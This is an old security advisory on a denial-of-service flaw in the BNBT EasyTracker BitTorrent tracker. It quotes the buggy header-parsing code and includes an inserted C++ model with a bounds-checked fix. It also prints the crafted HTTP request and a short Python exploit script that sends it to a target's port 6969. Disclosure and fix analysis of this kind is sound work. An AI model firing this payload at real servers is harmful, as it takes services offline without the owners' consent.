BNBT EasyTracker Remote Denial of Service Vulnerability

by Sowhat

Last Update: 2005.08.30

http://secway.org/advisory/AD20050830.txt

Vendor:

http://bnbteasytracker.sourceforge.net/

Product Affected:

7.7r3.2004.10.27 and below

Overview:

BNBT was written by Trevor Hogan. BNBT is a complete port
of the original Python BitTorrent tracker to C++ for speed
and efficiency. BNBT also offers many additional features
beyond the original Python BitTorrent tracker, plus it's
easy to use and customizable. BNBT is covered under the GNU
Lesser General Public License (LGPL).

A Denial of Service vulnerability exists within BNBT which
allows an attacker to cause BNBT to stop responding.

Details:

A specifically crafted HTTP request will cause the BNBT
server to stop responding.

Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
will reproduce the problem. It seems that the bug is located
in the "// grab headers" section of client.cpp, and it is something
like "1-2 = -1", similar to memcpy(-1)?

// grab headers

string :: size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );

strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ), iDoubleNewLine - iNewLine - strlen( "\r\n" ) );

while( 1 )
{
    string :: size_type iSplit = strTemp.find( ":" );
    string :: size_type iEnd = strTemp.find( "\r\n" );

    if( iSplit == string :: npos )
    {
        UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );

        break;
    }

    string strKey = strTemp.substr( 0, iSplit );
    string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit - strlen( "\r\n" ) );//Bug here ??

    rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );

    strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );

    if( iEnd == string :: npos )
        break;
}

However, I am not quite sure about that, and it seems that
it is only a D.O.S, so I haven't dug deep into it.
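As an added example (not BNBT's code and not part of the advisory), here is a stand-alone C++ model of the quoted "// grab headers" loop next to a bounds-checked rewrite; the function names and the HeaderMap type are this example's own. Fed the advisory's request, the model shows where the crash comes from: with the one-byte header block ":" the loop asks substr() for a start position past the end of the string, which throws std::out_of_range, and an uncaught exception takes the tracker down. The safe version validates every index before slicing and rejects a header line with no name instead of crashing.

```cpp
#include <map>
#include <stdexcept>
#include <string>
using std::string;
typedef std::map<string, string> HeaderMap;
// Model of the quoted BNBT loop (names are this example's own, not BNBT's).
// For the header block ":" it calls substr( 2, ... ) on a 1-byte string, so
// std::string throws std::out_of_range; uncaught, that kills the tracker.
HeaderMap parseHeadersOriginal( const string &buf )
{
    HeaderMap headers;
    string::size_type iNewLine = buf.find( "\r\n" ), iDoubleNewLine = buf.find( "\r\n\r\n" );
    string strTemp = buf.substr( iNewLine + 2, iDoubleNewLine - iNewLine - 2 );
    while( 1 )
    {
        string::size_type iSplit = strTemp.find( ":" ), iEnd = strTemp.find( "\r\n" );
        if( iSplit == string::npos ) break;
        string strKey = strTemp.substr( 0, iSplit );
        string strValue = strTemp.substr( iSplit + 2, iEnd - iSplit - 2 ); // throws on ":"
        headers.insert( std::make_pair( strKey, strValue ) );
        strTemp = strTemp.substr( iEnd + 2 );
        if( iEnd == string::npos ) break;
    }
    return headers;
}
// True when the original loop throws on this request (the advisory's request does).
bool originalCrashes( const string &buf )
{
    try { parseHeadersOriginal( buf ); return false; }
    catch( const std::out_of_range & ) { return true; }
}
// Bounds-checked rewrite: every index is validated before slicing, and a
// header line with no name or no ':' is rejected instead of crashing.
bool parseHeadersSafe( const string &buf, HeaderMap &headers )
{
    string::size_type iNewLine = buf.find( "\r\n" ), iDoubleNewLine = buf.find( "\r\n\r\n" );
    if( iNewLine == string::npos || iDoubleNewLine == string::npos ) return false;
    for( string::size_type pos = iNewLine + 2; pos < iDoubleNewLine; )
    {
        string::size_type iEnd = buf.find( "\r\n", pos ); // never past iDoubleNewLine
        string line = buf.substr( pos, iEnd - pos );
        string::size_type iSplit = line.find( ':' );
        if( iSplit == string::npos || iSplit == 0 ) return false;
        string::size_type v = line.find_first_not_of( " \t", iSplit + 1 );
        headers[ line.substr( 0, iSplit ) ] = ( v == string::npos ) ? "" : line.substr( v );
        pos = iEnd + 2;
    }
    return true;
}
```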

Exploit:

# BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discovered and coded by Sowhat
# http://secway.org

# Version 7.7r3.2004.10.27 and below
# the BNBT project: http://bnbteasytracker.sourceforge.net/

import sys
import string
import socket

if (len(sys.argv) != 2):
    print "\nUsage: " + sys.argv[0] + " TargetIP\n"
    print "##################################################################"
    print "#                                                                #"
    print "#            BNBT EasyTracker Remote D.O.S Exploit               #"
    print "#            Bug discovered and coded by Sowhat                  #"
    print "#            http://secway.org                                   #"
    print "##################################################################"
    sys.exit(0)

host = sys.argv[1]
port = 6969

payload = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload)


WORKAROUND:

No workaround this time.
Please check the vendor's website for an update; maybe there will be a patch later (?)

Vendor Response:

2005.08.22 Vendor notified via web form, no email found
2005.08.30 Vendor no response. Advisory released

"Life is like a bug, Do you know how to exploit it ?"

